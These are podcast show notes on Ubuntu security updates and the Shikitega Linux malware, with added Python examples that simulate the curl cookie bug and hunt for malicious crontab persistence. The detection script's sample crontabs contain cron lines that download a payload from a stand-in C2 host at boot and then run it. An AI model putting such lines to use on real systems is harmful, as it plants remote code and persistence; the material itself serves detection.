Episode 176

Posted on Friday, Sep 9, 2022
On this week’s episode we dive into the Shikitega Linux malware report from AT&T Alien Labs, plus we cover security updates for the Linux kernel, curl and Zstandard as well as some open positions on the team. Join us!

Show Notes

This week in Ubuntu Security Updates

13 unique CVEs addressed

[USN-5591-1, USN-5591-2, USN-5591-3, USN-5591-4, USN-5597-1, USN-5598-1] Linux kernel (+ HWE, AWS, Oracle) vulnerability [00:47]

[USN-5592-1, USN-5595-1, USN-5596-1, USN-5600-1] Linux kernel (+ OEM, HWE) vulnerabilities [01:04]

  • 2 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS)
  • Out-of-bounds write in the virtual terminal driver when changing VGA console fonts
  • Improper control-flow management in the Intel 10GbE PCIe driver - local DoS

[USN-5594-1, USN-5599-1] Linux kernel (+ Oracle) vulnerabilities [01:28]

[USN-5587-1] curl vulnerability [02:12]

  • 1 CVE addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS)
  • Cookies are generally NAME=VALUE pairs, with ASCII characters used for both parts
  • The ASCII character set contains the usual A-Za-z0-9 and punctuation (space, ", !, #, & etc.) plus a bunch of control codes - NUL, BEL, LF, CR, HT (\t) and more
  • Control codes all have a byte value below 32
  • curl since version 4.9 would accept cookies containing such control codes
  • As with any cookie, these then get sent back to the server on subsequent requests
  • Over time web servers have started rejecting cookies with control codes and returning an HTTP 400 (Bad Request) response
  • As such, a malicious "sister site" could return a cookie with control codes inside it; curl would then send this cookie to other sites in the same domain, which would reject every request, effectively denying service to the user
  • Fixed by having curl validate incoming cookies and reject any containing control codes in the first place, so they never enter the cookie jar
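
The chain above, as an added example written for these notes rather than curl's own code: a minimal cookie jar that stores a "sister site" cookie carrying a raw 0x01 byte, sends it on to another host in the domain, and gets a 400 back, beside the validating version that rejects the cookie up front. The cookie values, the domain example.com and the stand-in server are constructed; treating bytes below 0x20 plus 0x7f (DEL) as control codes is an assumption made here, since the notes only mention values below 32.

```python
"""Added example for these notes; it is not curl's source code. A minimal
cookie jar shows why accepting control codes in a Set-Cookie header lets one
site deny service to every other host in its domain, and the up-front
validation that closes the hole. Every header below is constructed."""


def has_control_code(data: bytes) -> bool:
    """True if any byte is a control code. Assumption made here: 0x00-0x1f
    and 0x7f (DEL) all count; the notes only mention values below 32."""
    return any(b < 0x20 or b == 0x7F for b in data)


class CookieJar:
    def __init__(self, validate: bool) -> None:
        self.validate = validate      # False mimics the behaviour before the fix
        self.cookies: list[bytes] = []

    def store(self, set_cookie: bytes) -> bool:
        """Keep the NAME=VALUE part of a Set-Cookie value (attributes after
        the first ';' are dropped). Returns True if the cookie was accepted."""
        name_value = set_cookie.split(b";", 1)[0].strip(b" ")
        if b"=" not in name_value:
            return False
        if self.validate and has_control_code(name_value):
            return False              # the fix: reject before it enters the jar
        self.cookies.append(name_value)
        return True

    def cookie_header(self) -> bytes:
        """What gets sent back on the next request to a matching host."""
        return b"Cookie: " + b"; ".join(self.cookies)


def server_status(cookie_header: bytes) -> int:
    """Stand-in for a modern web server: 400 Bad Request if the Cookie
    header carries control codes, 200 otherwise."""
    return 400 if has_control_code(cookie_header) else 200


def simulate(validate: bool) -> int:
    """A 'sister site' sets a cookie with an embedded 0x01 byte, then the
    client requests another host in the same domain; return that host's
    status code."""
    jar = CookieJar(validate)
    jar.store(b"lang=en; Path=/")
    jar.store(b"session=abc\x01def; Domain=example.com")
    return server_status(jar.cookie_header())


if __name__ == "__main__":
    print("vulnerable client gets HTTP", simulate(False))   # 400
    print("fixed client gets HTTP", simulate(True))         # 200
```

The point of working in bytes rather than str is that the offending characters (NUL included) survive untouched all the way from Set-Cookie to the outgoing Cookie header, which is exactly the path the bug rode; note also that only spaces are stripped around NAME=VALUE, since a blanket strip() would silently remove a leading or trailing tab and hide the problem.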

[USN-5593-1] Zstandard vulnerability [04:34]

Goings on in Ubuntu Security Community

AT&T Alien Labs teardown of Shikitega Linux malware [05:40]

  • https://cybersecurity.att.com/blogs/labs-research/shikitega-new-stealthy-malware-targeting-linux
  • Targets endpoints and IoT devices running Linux
  • Uses multiple different binaries to achieve its purpose - each one performs a single task in the infection chain
  • Uses various components of Metasploit along the way
    • A framework containing various exploits plus different tools to help develop exploits, scan environments etc
  • The initial dropper is a very small binary that is encoded using one of the standard Metasploit encoders to help it evade detection by AV scanners etc
  • Decodes basic shellcode which opens a socket to the C2 server and downloads additional shellcode to run, plus the mettle interpreter, so that it can make use of off-the-shelf Metasploit components in later stages
  • Also downloads the next-stage dropper
  • This again is encoded in the same way as the first component - contained within is shellcode to spawn a shell via /bin/sh - from this shell it then attempts to run commands to exploit two known privesc vulns - CVE-2021-4034 ([USN-5252-1, USN-5252-2] PolicyKit vulnerability from Episode 147) and CVE-2021-3493 ([USN-4916-2] Linux kernel vulnerability from Episode 113)
  • Once it has gained root privileges via these vulns, it then moves on to achieve persistence and execute the primary payload - a cryptominer
  • Persistence is achieved simply by using cron: one job downloads the cryptominer from the C2 on boot and another job executes it - and this is done for both the standard user and root
  • As such, the only traces left on the machine after a reboot are the crontabs
  • The cryptominer is XMRig, configured to mine Monero
  • C2 is seemingly fronted by Cloudflare and CloudFront
  • No details are provided on the initial compromise, but it is good to see details on the privesc vulns - both of these were patched in Ubuntu quite a while ago, and we released a Livepatch for the kernel privesc too - this shows the value in such services: you can stay protected against the kind of vulnerabilities that attackers are actually exploiting without needing to reboot
  • Shows the increasing prevalence of Linux malware (and the resulting interest in it from organisations like AT&T) but also the value in ensuring systems are kept up to date
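
Since the crontabs are the one artefact this malware leaves behind, the hunt a responder would want is a pass over every user's crontab looking for the two-job pattern above: a job that fetches something from the network at boot, and a job that runs a binary out of a scratch directory. The following is an added example written for these notes, not code from the AT&T report; the sample crontabs, the hostname c2.example.invalid and the payload paths are constructed placeholders, and the choice of curl/wget and /tmp, /var/tmp, /dev/shm as the indicators is an assumption made here, generalised slightly beyond the single case in the report.

```python
"""Added example for these notes, not code from the AT&T report: a hunt over
crontab text for the persistence pattern described above, one job that fetches
a payload from the network at boot and another that executes it. The crontab
contents, hostnames and paths below are constructed placeholders."""
import re

FETCH_TOOLS = re.compile(r"\b(curl|wget)\b")
URL = re.compile(r"https?://")
# locations where a scheduled binary has no business living (assumed list)
SUSPECT_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")


def parse_crontab(text):
    """Yield (schedule, command) for each job line, skipping blank lines,
    comments and VAR=value environment settings."""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("@"):                    # @reboot, @daily, ...
            sched, _, cmd = line.partition(" ")
        else:
            parts = line.split(None, 5)
            if len(parts) < 6 or "=" in parts[0]:   # env line, not a job
                continue
            sched, cmd = " ".join(parts[:5]), parts[5]
        yield sched, cmd.strip()


def suspicious_jobs(text, user):
    """Return a list of findings (dicts) for one user's crontab."""
    findings = []
    for sched, cmd in parse_crontab(text):
        reasons = []
        if FETCH_TOOLS.search(cmd) and URL.search(cmd):
            reasons.append("downloads from the network")
        if any(d in cmd for d in SUSPECT_DIRS):
            reasons.append("touches a world-writable directory")
        if reasons and sched == "@reboot":
            reasons.append("at boot")
        if reasons:
            findings.append({"user": user, "schedule": sched,
                             "command": cmd, "reasons": reasons})
    return findings


# constructed crontabs mimicking the pattern from the report
SAMPLE_USER_CRONTAB = """\
# m h dom mon dow command
PATH=/usr/local/bin:/usr/bin:/bin
@reboot curl -s http://c2.example.invalid/payload -o /var/tmp/.x
*/5 * * * * /var/tmp/.x >/dev/null 2>&1
0 3 * * * /home/alice/bin/backup.sh
"""

SAMPLE_ROOT_CRONTAB = """\
@reboot wget -q https://c2.example.invalid/payload -O /tmp/.x
* * * * * /tmp/.x
"""


def main():
    for user, text in (("alice", SAMPLE_USER_CRONTAB),
                       ("root", SAMPLE_ROOT_CRONTAB)):
        for f in suspicious_jobs(text, user):
            print(f"[{f['user']}] {f['schedule']} {f['command']}")
            print("    " + "; ".join(f["reasons"]))


if __name__ == "__main__":
    main()
```

On a live Ubuntu host the per-user crontabs are the files under /var/spool/cron/crontabs (one per user, readable only by root), so the same function can be run over each of those plus /etc/crontab and /etc/cron.d/*; the backup job in the sample is there to show that an ordinary scheduled script produces no finding.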

systemd/open-vm-tools regression for Ubuntu 18.04 LTS [10:56]

  • Had mentioned last week that I would likely cover this - is still a work-in-progress so hopefully next week 🤞

Hiring [11:30]

Get in contact